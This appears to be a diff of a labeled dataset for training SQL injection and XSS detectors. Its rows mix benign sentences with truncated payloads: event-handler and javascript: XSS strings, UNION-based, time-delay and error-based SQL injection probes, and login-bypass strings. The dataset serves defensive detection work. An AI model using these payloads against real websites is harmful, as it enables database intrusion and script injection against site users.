1650,2,SQLi,19173 +1 and 3715 in ( ( char ( 113 ) +char ( 113 ) +char,2,SQLi,14530 +"<cite oncopy=""alert(1)"" contenteditable>test</cite",1,XSS,2969 +1' ) as ohcs where 9588 = 9588 or elt ( 6272 = 627,2,SQLi,18891 +"<datalist draggable=""true"" ondragstart=""alert(1)"">",1,XSS,5991 +) or ( a = a,2,SQLi,11660 +"To unfreeze the frames, select ""View,"" then select",0,normal,25254 +Where's the bed and breakfast?,0,normal,23551 <script>%(payload)s</script>,1,XSS,729 -"<video onkeypress=""alert(1)"" contenteditable>test<",1,XSS,7588 -<menu onpointerdown=alert(1)>XSS</menu>,1,XSS,7544 +"<q onkeypress=""alert(1)"" contenteditable>test</q>",1,XSS,7590 +"<nextid draggable=""true"" ondragend=""alert(1)"">test",1,XSS,7546 "<iframe src iframe src=""javascript:javascript:aler",1,XSS,413 -1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR,2,SQLi,11339 -Home Depot is offering up to 20% off select Nest T,0,normal,26093 -"<a draggable=""true"" ondragend=""alert(1)"">test</a>",1,XSS,5746 -Select a hairstyle for a special occasion.,0,normal,24053 -"1' ) ) ) and row ( 6237,7469 ) > ( select count ( ",2,SQLi,17210 -"<article onkeyup=""alert(1)"" contenteditable>test</",1,XSS,3268 -"1%"" ) ) union all select null,null,null,null,null,",2,SQLi,20359 -<dt onpointerup=alert(1)>XSS</dt>,1,XSS,8809 -Select expose.,0,normal,24691 +AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(7,2,SQLi,11341 +His select works have been published in io volumes,0,normal,26095 +<dt onpointerdown=alert(1)>XSS</dt>,1,XSS,5748 +Select a painting technique to try.,0,normal,24055 +-1217' ) ) ) order by 1#,2,SQLi,17212 +"<video onpaste=""alert(1)"" contenteditable>test</vi",1,XSS,3270 +1 ) ) or 1022 = ( select count ( * ) from all_user,2,SQLi,20361 +<style>@keyframes slidein {}</style><output style=,1,XSS,8811 +Select wrap.,0,normal,24693 <script>javascript:alert(1)</script\x0A,1,XSS,418 -#ERROR!,2,SQLi,11262 -><embed src='//ajax.googleapis.com/ajax/libs/yui/2,1,XSS,9818 -1' ) ) as wuws where 6917 = 6917 union all select ,2,SQLi,15306 -"1"" ) ) and 6537 = dbms_pipe.receive_message ( chr ",2,SQLi,16282 -,0,normal,23133 -The select committee will continue its work over t,0,normal,25352 -<colgroup onpointerover=alert(1)>XSS</colgroup>,1,XSS,2083 -There is simply no point in dividing the spoils am,0,normal,25330 -1' ) as rvch where 1863 = 1863 or 8384 = like ( 'a,2,SQLi,12162 -"<b onkeypress=""alert(1)"" contenteditable>test</b>",1,XSS,3374 -<address onpointerdown=alert(1)>XSS</address>,1,XSS,5727 -"1%"" ) ) ) and 4595 = 4595#",2,SQLi,20492 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10637 --8203 ) ) as eqlf where 6132 = 6132 union all sele,2,SQLi,20765 -Select a class to improve your skills.,0,normal,24108 -select ( case when ( 9388 = 4322 ) then 1 else 938,2,SQLi,17451 -"<div onmouseup=""alert(1)"">test</div>",1,XSS,3914 --3179'+ ( select 'tzzz' where 3191 = 3191 union al,2,SQLi,13480 -<svg><ruby onload=alert(1)></ruby>,1,XSS,5537 -<b onpointerup=alert(1)>XSS</b>,1,XSS,8003 -<blockquote id=x tabindex=1 onfocus=alert(1)></blo,1,XSS,5388 -"1"" union all select null,null,null,null,null,null,",2,SQLi,22117 -"<u onmouseleave=""alert(1)"">test</u>",1,XSS,2739 -<svg><sub onload=alert(1)></sub>,1,XSS,5053 -<style id=x tabindex=1 onfocusin=alert(1)></style>,1,XSS,4001 -Get up to 60% off select espadrilles until Septemb,0,normal,26145 -"<template onkeypress=""alert(1)"" contenteditable>te",1,XSS,2428 -", begin declare @var varchar ( 8000 ) set @var = '",2,SQLi,11939 -"<meta onmouseup=""alert(1)"">test</meta>",1,XSS,6834 -Congratulations to our very own @JulienMid and @Va,0,normal,26508 -1 ) as iknl where 3885 = 3885 rlike sleep ( 5 ) #,2,SQLi,18072 +") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(",2,SQLi,11264 +ng-appng-csp ng-click=$event.view.alert(1337)><scr,1,XSS,9820 +"-3566' where 3641 = 3641 union all select 3641,364",2,SQLi,15308 +1 ) as kzyb where 7023 = 7023 and 5556 = ( select ,2,SQLi,16284 +between,0,normal,23135 +The young Humanists would have gladly welcomed him,0,normal,25354 +"<p draggable=""true"" ondragleave=""alert(1)"">test</p",1,XSS,2084 +There are two-hour tours on select dates throughou,0,normal,25332 +-9446 ) ) as wmrq where 3705 = 3705 union all sele,2,SQLi,12164 +"<time onmouseover=""alert(1)"">test</time>",1,XSS,3376 +<canvas onpointermove=alert(1)>XSS</canvas>,1,XSS,5729 +-7903 where 6699 = 6699 or 8571 = 8571--,2,SQLi,20494 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10639 +1' ) ) or 2367 = ( select count ( * ) from rdb$fie,2,SQLi,20767 +Select the right lens for the shot.,0,normal,24110 +"select sleep ( 5 ) and ""jvys"" like ""jvys",2,SQLi,17453 +"<iframe onmousemove=""alert(1)"">test</iframe>",1,XSS,3916 +-3326'+ ( select xitp where 7621 = 7621 union all ,2,SQLi,13482 +"<blink draggable=""true"" ondrag=""alert(1)"">test</bl",1,XSS,5539 +<article id=x tabindex=1 onfocus=alert(1)></articl,1,XSS,8005 +<cite onfocusout=alert(1) tabindex=1 id=x></cite><,1,XSS,5390 +1 ) and 7533 = 7533 and ( 7175 = 7175,2,SQLi,22119 +"<spacer oncontextmenu=""alert(1)"">test</spacer>",1,XSS,2740 +<q id=x tabindex=1 onbeforeactivate=alert(1)></q>,1,XSS,5055 +"<style>@keyframes x{}</style><br style=""animation-",1,XSS,4003 +"Get an extra 15% off select furniture by Corvus, a",0,normal,26147 +<details onpointerenter=alert(1)>XSS</details>,1,XSS,2429 +) or pg_sleep ( __TIME__ ) --,2,SQLi,11941 +<tt onpointerover=alert(1)>XSS</tt>,1,XSS,6836 +Congratulations to our own @ JulienMid and @ Value,0,normal,26510 +"select * from generate_series ( 3086,3086,case whe",2,SQLi,18074 "<a&#32;href&#61;&#91;&#00;&#93;""&#00; onmouseover=",1,XSS,852 -Insert your contact information.,0,normal,22688 -The commissions in the three counties represented ,0,normal,25472 -"-1280"" union all select 8602,8602,8602,8602,8602,8",2,SQLi,16348 -"<dir onmousedown=""alert(1)"">test</dir>",1,XSS,5879 -Select your disagreement.,0,normal,24912 -1 ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +ch,2,SQLi,19224 -<area id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,4612 -"1%"" ) ) ) and 9198 = 9198--",2,SQLi,16365 -javascript://'/</title></style></textarea></script,1,XSS,9541 -"<image xmlns:xlink=""http://www.w3.org/1999/xlink"">",1,XSS,9208 -<img onload=alert(1)>//INJECTX,1,XSS,9824 -"<style>@keyframes x{}</style><textarea style=""anim",1,XSS,2490 -select * from users where id = 1.&&@ union select ,2,SQLi,11923 -Fetch records where necessary.,0,normal,23290 -"<dir onmouseout=""alert(1)"">test</dir>",1,XSS,7391 -"<style>@keyframes x{}</style><thead style=""animati",1,XSS,2850 -"-2246"" ) ) union all select 4613,4613,4613,4613,46",2,SQLi,14070 -Join dinner.,0,normal,23050 -<optgroup onpointermove=alert(1)>XSS</optgroup>,1,XSS,5882 -1,0,normal,26647 -"<noframes onmouseenter=""alert(1)"">test</noframes>",1,XSS,4453 -Be sure the toys you select are suitable for babie,0,normal,26334 -Where's the best place to indulge in desserts?,0,normal,23806 -ET. Call Me By Your Name is now in select theaters,0,normal,26212 -Delete the email.,0,normal,22869 -"<nav onkeydown=""alert(1)"" contenteditable>test</na",1,XSS,2480 -They'll update the software.,0,normal,23002 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10458 -(select(0)from(select(sleep(5)))v)%2f'+(select(0)f,2,SQLi,11152 -1 ) and 6240 = ( 'qqpjq'|| ( select case 6240 when,2,SQLi,13246 -"1 and elt ( 4249 = 4249,7259 )",2,SQLi,18526 -"-5032' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,13297 -WAITFOR DELAY '0:0:5'--,2,SQLi,11311 -select ( case when ( 6843 = 2657 ) then 6843 else ,2,SQLi,21573 -[a](javascript://www.google.com%0Aalert(1)),1,XSS,9436 -"1"" ) where 2570 = 2570 and 3707 = ( select count (",2,SQLi,19129 -"<figure oncopy=""alert(1)"" contenteditable>test</fi",1,XSS,7254 -1'|| ( select 'vwop' where 8536 = 8536 or 5356 = (,2,SQLi,13285 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,3507 -"<;A HREF="";http://www.gohttp://www.google.com/ogle",1,XSS,1680 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,20634 -"1"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ",2,SQLi,19532 -"<legend draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,8131 -"{""id"":null,""firstName"":""Tao"",""lastName"":""Ming"",""sp",0,normal,26871 -Where's your SQL proficiency?,0,normal,23389 -"-1418"" ) where 7528 = 7528 order by 1#",2,SQLi,15126 -1%' ) and 7756 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,16965 -<button onScroll=javascript:alert(1)>,1,XSS,9663 -"iif ( 9229 = 4158,1,1/0 )",2,SQLi,20455 -"1' ) ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,13501 -"<col onmouseup=""alert(1)"">test</col>",1,XSS,3344 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,13185 -"1"" where 7631 = 7631 and 4733 = 3439",2,SQLi,16245 -He selected a color for his new bedroom.,0,normal,23789 -"-4305 ) ) ) union all select 2401,2401--",2,SQLi,12776 -"1 ) procedure analyse ( extractvalue ( 5840,concat",2,SQLi,20057 -"-9535"" order by 1--",2,SQLi,16944 -"<shadow onmouseover=""alert(1)"">test</shadow>",1,XSS,5238 -"<style>@keyframes x{}</style><figcaption style=""an",1,XSS,7806 -1' ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ,2,SQLi,13408 -1%' or 9643 = ( select count ( * ) from domain.dom,2,SQLi,16897 -\x3c,1,XSS,1082 -1' ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||,2,SQLi,18049 -"<image src=""javascript:alert(2)""> // IE6, O10.10↓,",1,XSS,9205 -"<div onmouseleave=""alert(1)"">test</div>",1,XSS,1932 -I'm thinking of where to go for a bike ride.,0,normal,23945 -<video/poster/onerror=alert()>,1,XSS,1151 -"-9672%"" ) ) ) order by 1#",2,SQLi,19223 -"<track onmousedown=""alert(1)"">test</track>",1,XSS,5950 -<shadow onpointerenter=alert(1)>XSS</shadow>,1,XSS,8309 -They are used to select one of the reverb effect t,0,normal,25317 -"{""id"":null,""firstName"":""Kirin"",""lastName"":""Swatan""",0,normal,27330 -"-5945' ) ) ) union all select 4266,4266,4266,4266,",2,SQLi,14263 -"<img onmousedown=""alert(1)"">test</img>",1,XSS,5178 -1'+ ( select dpkp where 4836 = 4836 and sleep ( 5 ,2,SQLi,14099 -"select * from generate_series ( 3267,3267,case whe",2,SQLi,17215 -"<style>@keyframes x{}</style><article style=""anima",1,XSS,8312 --8453 ) ) ) or 3038 = 3038,2,SQLi,21137 -Current / Elliott 25% off your purchase; select ex,0,normal,26259 -"{""id"":null,""name"":""Leopard Seal""}",0,normal,27240 +Select a scenic view.,0,normal,22690 +The collection is available at select Barneys stor,0,normal,25474 +"1"" ) and ( select 2* ( if ( ( select * from ( sele",2,SQLi,16350 +"<b onmouseleave=""alert(1)"">test</b>",1,XSS,5881 +Select your fight.,0,normal,24914 +"-7307' ) ) union all select 5215,5215,5215,5215--",2,SQLi,19226 +<article id=x tabindex=1 onfocusin=alert(1)></arti,1,XSS,4614 +"1"" and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) |",2,SQLi,16367 +"javascript://</title>""/</script></style></textarea",1,XSS,9543 +<img src ?itworksonchrome?\/onerror = alert(1)???,1,XSS,9210 +"<a href=""javascript:alert(1)"" onmouseover=alert(1)",1,XSS,9826 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2491 +"select * from users where id = 1 or ""@ ( "" or 1 = ",2,SQLi,11925 +Calculate sums where required.,0,normal,23292 +<dfn id=x tabindex=1 onbeforeactivate=alert(1)></d,1,XSS,7393 +"<map onkeyup=""alert(1)"" contenteditable>test</map>",1,XSS,2851 +"-2726"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""oc",2,SQLi,14072 +Create story.,0,normal,23052 +"<bgsound onmouseleave=""alert(1)"">test</bgsound>",1,XSS,5884 +1,0,normal,26649 +"<image onmousedown=""alert(1)"">test</image>",1,XSS,4455 +"Bagley, a forward for the Sacramento Kings, was pr",0,normal,26336 +Let's choose a destination for our getaway.,0,normal,23808 +"Enter your 4-digit pin, select the ' PIN Services ",0,normal,26214 +Create a site.,0,normal,22871 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2481 +She updated her profile.,0,normal,23004 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10460 +(select(0)from(select(sleep(5)))v)/*'+(select(0)fr,2,SQLi,11154 +1'|| ( select 'oxas' from dual where 8284 = 8284 o,2,SQLi,13248 +"1"" where 6179 = 6179",2,SQLi,18528 +-5524 ) as eoyk where 6928 = 6928 union all select,2,SQLi,13299 +or WAITFOR DELAY '0:0:5'--,2,SQLi,11313 +"1"" ) ) ) and 3707 = ( select count ( * ) from sysi",2,SQLi,21575 +[a](JaVaScRiPt:alert(1)),1,XSS,9438 +"-4325' or make_set ( 9354 = 9354,7185 )",2,SQLi,19131 +"<rp oncut=""alert(1)"" contenteditable>test</rp>",1,XSS,7256 +"1%' ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13287 +<bdi onpointerleave=alert(1)>XSS</bdi>,1,XSS,3509 +";>;<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(;",1,XSS,1681 +"-5925 ) where 5758 = 5758 union all select 5758,57",2,SQLi,20636 +"1"" ) ) or extractvalue ( 1297,concat ( 0x5c,0x7171",2,SQLi,19534 +"<image ondblclick=""alert(1)"">test</image>",1,XSS,8133 +"{""id"":null,""firstName"":""Ayodhyala"",""lastName"":""Bha",0,normal,26873 +Retrieve information where required.,0,normal,23391 +1' ) ) as tley where 3539 = 3539,2,SQLi,15128 +1 ) where 7684 = 7684 and char ( 111 ) ||char ( 77,2,SQLi,16967 +<button onSelect=javascript:alert(1)>,1,XSS,9665 +"select count ( * ) from all_users t1,all_users t2,",2,SQLi,20457 +"1%"" ) ) and 2006 = 2006",2,SQLi,13503 +"<output ondblclick=""alert(1)"">test</output>",1,XSS,3346 +"-8760"" union all select 2309,2309,2309,2309,2309,2",2,SQLi,13187 +1%' ) ) ) rlike sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,16247 +Let's discuss where to go for our road trip.,0,normal,23791 +"-1510"" ) as rqrv where 4507 = 4507 union all selec",2,SQLi,12778 +"-6815 ) where 2498 = 2498 union all select 2498,24",2,SQLi,20059 +"1"" ) and exp ( ~ ( select * from ( select concat (",2,SQLi,16946 +"<style>@keyframes x{}</style><frame style=""animati",1,XSS,5240 +"<noembed onclick=""alert(1)"">test</noembed>",1,XSS,7808 +"1%"" ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ""%",2,SQLi,13410 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,16899 +\u003c,1,XSS,1083 +1' ) where 7537 = 7537 and 2006 = 2006,2,SQLi,18051 +"<image xlink:href=""data:image/svg+xml,%3Csvg xmlns",1,XSS,9207 +"<li onmousedown=""alert(1)"">test</li>",1,XSS,1933 +Where did you hear about that new café from?,0,normal,23947 +<isindex/autofocus/onfocus=alert()>,1,XSS,1152 +"1' ) or extractvalue ( 1297,concat ( 0x5c,0x717170",2,SQLi,19225 +"<wbr draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5952 +"<strong onmousemove=""alert(1)"">test</strong>",1,XSS,8311 +They act in a similar way to Parliamentary select ,0,normal,25319 +"{""id"":null,""name"":""trouble""}",0,normal,27329 +"1"" ) as rcnk where 1800 = 1800",2,SQLi,14265 +"<style>@keyframes x{}</style><shadow style=""animat",1,XSS,5180 +select ( case when ( 9299 = 2760 ) then 1 else 929,2,SQLi,14101 +1 ) and 6969 = ( select 6969 from pg_sleep ( 5 ) ),2,SQLi,17217 +<style onpointerup=alert(1)>XSS</style>,1,XSS,8314 +"1"" ) or ( select 9173 from ( select count ( * ) ,c",2,SQLi,21139 +"Crate & Barrel: Up to 50% off outdoor furniture, 4",0,normal,26261 +"{""id"":null,""firstName"":""Rita"",""lastName"":""Leng"",""s",0,normal,27238 "{""id"":null,""name"":""Poliwhirl""}",0,normal,27536 -1' ) as uaoz where 2464 = 2464,2,SQLi,17020 -<BODY ONLOAD=alert('')>,1,XSS,4466 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6800 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7988 -"<template draggable=""true"" ondragend=""alert(1)"">te",1,XSS,7080 -"<label onmouseleave=""alert(1)"">test</label>",1,XSS,6967 -1 ) ) and 9254 = ( select count ( * ) from rdb$fie,2,SQLi,15203 -"<applet ondblclick=""alert(1)"">test</applet>",1,XSS,4143 -Where's your SQL help?,0,normal,23412 -Select your answer ----------------- cell wall nuc,0,normal,25568 +"1 ) ) and 4241 = convert ( int, ( select char ( 11",2,SQLi,17022 +"<figcaption onmouseenter=""alert(1)"">test</figcapti",1,XSS,4468 +<img id=x tabindex=1 onfocus=alert(1)></img>,1,XSS,6802 +"<frameset onbeforecut=""alert(1)"" contenteditable>t",1,XSS,7990 +"<style>@keyframes x{}</style><del style=""animation",1,XSS,7082 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,6969 +"-5819%"" ) ) or 4144 = ( select upper ( xmltype ( c",2,SQLi,15205 +<p onfocusout=alert(1) tabindex=1 id=x></p><input ,1,XSS,4145 +Where's your SQL information?,0,normal,23414 +Select what you want to copy by highlighting the t,0,normal,25570 </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLa,1,XSS,877 -"1"" where 8672 = 8672 union all select null,null#",2,SQLi,21254 -1 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) #,2,SQLi,21700 -"-6457 where 1764 = 1764 union all select 1764,1764",2,SQLi,21607 -"1"" ) ) ) union all select null,null,null,null#",2,SQLi,16389 -1 ) and 8189 = ( select count ( * ) from sysibm.sy,2,SQLi,15980 -"<code draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,3052 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,22076 -"-3035"" ) union all select 7912,7912,7912#",2,SQLi,19509 -"1' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x7171",2,SQLi,14600 -"-9050 union all select 9346,9346,9346,9346,9346,93",2,SQLi,15329 -"<img onkeyup=""alert(1)"" contenteditable>test</img>",1,XSS,2492 --2951 or 4189 = 2291,2,SQLi,15339 -1'|| ( select 'gikt' where 8447 = 8447 or 1022 = (,2,SQLi,20239 -"<basefont oncontextmenu=""alert(1)"">test</basefont>",1,XSS,4778 -admin' or '1'='1'/*,2,SQLi,9908 -I'm considering where to have a peaceful retreat.,0,normal,23894 -Insert the disc.,0,normal,22842 -Join the music band.,0,normal,22678 -"-6253' union all select 5756,5756,5756,5756,5756,5",2,SQLi,17533 -1' ) ) as bewk where 3672 = 3672 or sleep ( 5 ) --,2,SQLi,16959 -1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) |,2,SQLi,20154 -1%' ) or 4240 = ( select 4240 from pg_sleep ( 5 ) ,2,SQLi,20531 +1' where 9222 = 9222 and 3707 = ( select count ( *,2,SQLi,21256 +"1"" ) where 2388 = 2388 union all select null,null,",2,SQLi,21702 +"1%"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x7",2,SQLi,21609 +1 ) where 5096 = 5096 and 8635 = ( select count ( ,2,SQLi,16391 +"1"" ) ) ) order by 1#",2,SQLi,15982 +<image3 onpointerover=alert(1)>XSS</image3>,1,XSS,3053 +-7963'+ ( select 'kxzh' where 7039 = 7039 union al,2,SQLi,22078 +1' ) ) as xuab where 4369 = 4369 union all select ,2,SQLi,19511 +1'|| ( select 'uedk' where 4655 = 4655,2,SQLi,14602 +"1"" ) ) ) and 5556 = ( select count ( * ) from all_",2,SQLi,15331 +<noframes onpointerout=alert(1)>XSS</noframes>,1,XSS,2493 +"1' ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,15341 +"1"" ) and 9198 = 9198--",2,SQLi,20241 +"<html onmouseout=""alert(1)"">test</html>",1,XSS,4780 +admin' or 1=1,2,SQLi,9910 +I need to decide where to have dinner.,0,normal,23896 +Update your feed.,0,normal,22844 +Update the travel itinerary.,0,normal,22680 +"iif ( 2976 = 2976,1,1/0 )",2,SQLi,17535 +1'+ ( select bruk where 1400 = 1400 procedure anal,2,SQLi,16961 +1' in boolean mode ) and 3787 = 7750--,2,SQLi,20156 +1' ) as nmzp where 3794 = 3794 and 6510 = ( select,2,SQLi,20533 <style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;,1,XSS,854 -select,0,normal,26559 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10967 -1' ) ) or 5356 = ( select count ( * ) from sysuser,2,SQLi,22304 -"1"" union all select null,null,null#",2,SQLi,13122 --8971'|| ( select 'smyx' where 7970 = 7970 union a,2,SQLi,13404 -"rock mag select, which they did not.",0,normal,25743 -I selected the perfect gift.,0,normal,22999 -1' ) ) as jntr where 5051 = 5051 and ( select 9067,2,SQLi,22387 -"Simply select a friend, press the Bitmoji button o",0,normal,25548 -"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0",2,SQLi,10894 -al\u0065rt(1),1,XSS,4496 -"<data onclick=""alert(1)"">test</data>",1,XSS,8174 -"<dd ondblclick=""alert(1)"">test</dd>",1,XSS,6656 -admin' or '1' = '1'/*,2,SQLi,12040 -"<tfoot onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,2369 -"<fieldset onclick=""alert(1)"">test</fieldset>",1,XSS,4781 -"-8982' in boolean mode ) union all select 5367,536",2,SQLi,12324 -Please select a wedding favor.,0,normal,24377 -"1"" ) ) ) and exp ( ~ ( select * from ( select conc",2,SQLi,19335 -1'|| ( select 'bccx' where 5881 = 5881 and elt ( 1,2,SQLi,22010 -Fetch information where necessary.,0,normal,23356 -"<head onmouseenter=""alert(1)"">test</head>",1,XSS,8717 -"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10648 -1' and 7533 = 7533 and 'jwgc' = 'jwgc,2,SQLi,18226 -<svg><time onload=alert(1)></time>,1,XSS,5987 -"1%"" ) ) waitfor delay '0:0:5'--",2,SQLi,16922 -1 and ( select 2* ( if ( ( select * from ( select ,2,SQLi,19191 -<rtc onpointerdown=alert(1)>XSS</rtc>,1,XSS,5802 -1' ) ) and 6510 = ( select count ( * ) from sysuse,2,SQLi,21981 -<svg><noembed onload=alert(1)></noembed>,1,XSS,7207 -"<cite draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,7344 -"1"" or 8384 = like ( 'abcdefg',upper ( hex ( random",2,SQLi,12534 -"<legend onkeypress=""alert(1)"" contenteditable>test",1,XSS,7561 -<spacer onpointerdown=alert(1)>XSS</spacer>,1,XSS,8097 +select,0,normal,26561 +#ERROR!,2,SQLi,10969 +"1"" and 4288 = 3696 and ""qqam"" like ""qqam",2,SQLi,22306 +1' ) and 9660 = ( select count ( * ) from all_user,2,SQLi,13124 +"1' where 8277 = 8277 or updatexml ( 1808,concat ( ",2,SQLi,13406 +"Right now, only a select few appear to be obtainin",0,normal,25745 +Where is my iPhone?,0,normal,23001 +1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||,2,SQLi,22389 +"Simply add the items you want, select the most app",0,normal,25550 +"""),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'",2,SQLi,10896 +<area onpointermove=alert(1)>XSS</area>,1,XSS,4498 +"<q onmouseleave=""alert(1)"">test</q>",1,XSS,8176 +<dir onpointerover=alert(1)>XSS</dir>,1,XSS,6658 +select * from users where id = 1 <@. union select ,2,SQLi,12042 +"<datalist draggable=""true"" ondragleave=""alert(1)"">",1,XSS,2370 +<applet onpointerup=alert(1)>XSS</applet>,1,XSS,4783 +"1"" ) where 6897 = 6897",2,SQLi,12326 +Select the best wedding vows.,0,normal,24379 +select ( case when ( 3486 = 6373 ) then 3486 else ,2,SQLi,19337 +-4389' ) ) ) or ( 1139 = 3499 ) *3499 and ( ( ( 'q,2,SQLi,22012 +Fetch data where valid.,0,normal,23358 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8719 +UNION ALL SELECT USER()--,2,SQLi,10650 +1' ) ) ) or 1022 = ( select count ( * ) from all_u,2,SQLi,18228 +<strong onpointerout=alert(1)>XSS</strong>,1,XSS,5989 +1%' ) ( select ( case when ( 5451 = 5451 ) then re,2,SQLi,16924 +"1 or row ( 1045,7562 ) > ( select count ( * ) ,con",2,SQLi,19193 +<style>:target {color: red;}</style><content id=x ,1,XSS,5804 +-1354 ) ) or 8571 = 8571--,2,SQLi,21983 +<base id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,7209 +<style>:target {transform: rotate(180deg);}</style,1,XSS,7346 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,12536 +<font onpointerdown=alert(1)>XSS</font>,1,XSS,7563 +"<tfoot onkeyup=""alert(1)"" contenteditable>test</tf",1,XSS,8099 <embed code=javascript:javascript:alert(1);></embe,1,XSS,785 -1' ) where 6622 = 6622 order by 1--,2,SQLi,12250 -&lt;META HTTP-EQUIV=&quot;Link&quot; Content=&quot,1,XSS,1410 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10730 -1 where 2988 = 2988 or 1022 = ( select count ( * ),2,SQLi,16539 -Select a font style for the project.,0,normal,24191 -"<colgroup draggable=""true"" ondragenter=""alert(1)"">",1,XSS,3010 -"select * from generate_series ( 1134,1134,case whe",2,SQLi,18071 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11094 -"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""",1,XSS,4015 -"<sup onmouseup=""alert(1)"">test</sup>",1,XSS,7456 -1' or exp ( ~ ( select * from ( select concat ( 0x,2,SQLi,12914 -<title id=x tabindex=1 onfocusin=alert(1)></title>,1,XSS,3864 -"1"" ) ) ) and 3824 = benchmark ( 5000000,md5 ( 0x76",2,SQLi,19118 -"<figcaption oncut=""alert(1)"" contenteditable>test<",1,XSS,1896 -"<ins onclick=""alert(1)"">test</ins>",1,XSS,5443 -`'><script>\x0Cjavascript:alert(1)</script>,1,XSS,570 -Filter list.,0,normal,23094 --4262%' ) ) ) or 4747 = dbms_utility.sqlid_to_sqlh,2,SQLi,22239 -<style>:target {color: red;}</style><pre id=x styl,1,XSS,1817 -select,0,normal,26642 -Select truck.,0,normal,24704 -1%' ) order by 1#,2,SQLi,19779 -"1"" ) rlike ( select * from ( select ( sleep ( 5 ) ",2,SQLi,19712 +1' or 4411 = ( select count ( * ) from sysusers as,2,SQLi,12252 +&lt;STYLE&gt;BODY{-moz-binding:url(&quot;http://ha,1,XSS,1411 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10732 +"1"" ) ) or ( select 9173 from ( select count ( * ) ",2,SQLi,16541 +Select a travel destination for your vacation.,0,normal,24193 +"<figcaption oncontextmenu=""alert(1)"">test</figcapt",1,XSS,3011 +1' ) ) as oocd where 2919 = 2919 or 8384 = like ( ,2,SQLi,18073 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11096 +<bdo onblur=alert(1) tabindex=1 id=x></bdo><input ,1,XSS,4017 +"<area onkeydown=""alert(1)"" contenteditable>test</a",1,XSS,7458 +"-5052 ) ) ) union all select 8351,8351,8351,8351#",2,SQLi,12916 +<input id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,3866 +1' ) ) as cyom where 2318 = 2318 and 7533 = 7533--,2,SQLi,19120 +"<span draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,1897 +<center id=x tabindex=1 onbeforedeactivate=alert(1,1,XSS,5445 +`'><script>\x0Cjavascript:alert(1)</script>,1,XSS,570 +Create quiz.,0,normal,23096 +"1 ) ) ) and 6055 = ctxsys.drithsx.sn ( 6055, ( chr",2,SQLi,22241 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1818 +1,0,normal,26644 +Select car.,0,normal,24706 +"-2441' union all select 1853,1853,1853,1853,1853,1",2,SQLi,19781 +"-8609' union all select 9384,9384,9384,9384--",2,SQLi,19714 "{""id"":null,""name"":""MarineAngemon""}",0,normal,27594 -"<caption onclick=""alert(1)"">test</caption>",1,XSS,6103 -"<dt onmousemove=""alert(1)"">test</dt>",1,XSS,2976 -"iif ( 9007 = 3836,1,1/0 )",2,SQLi,17365 -"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10493 +"<ul draggable=""true"" ondrag=""alert(1)"">test</ul>",1,XSS,6105 +<style>:target {transform: rotate(180deg);}</style,1,XSS,2977 +1' ) where 1369 = 1369 and 4840 = 1697#,2,SQLi,17367 +"ORDER 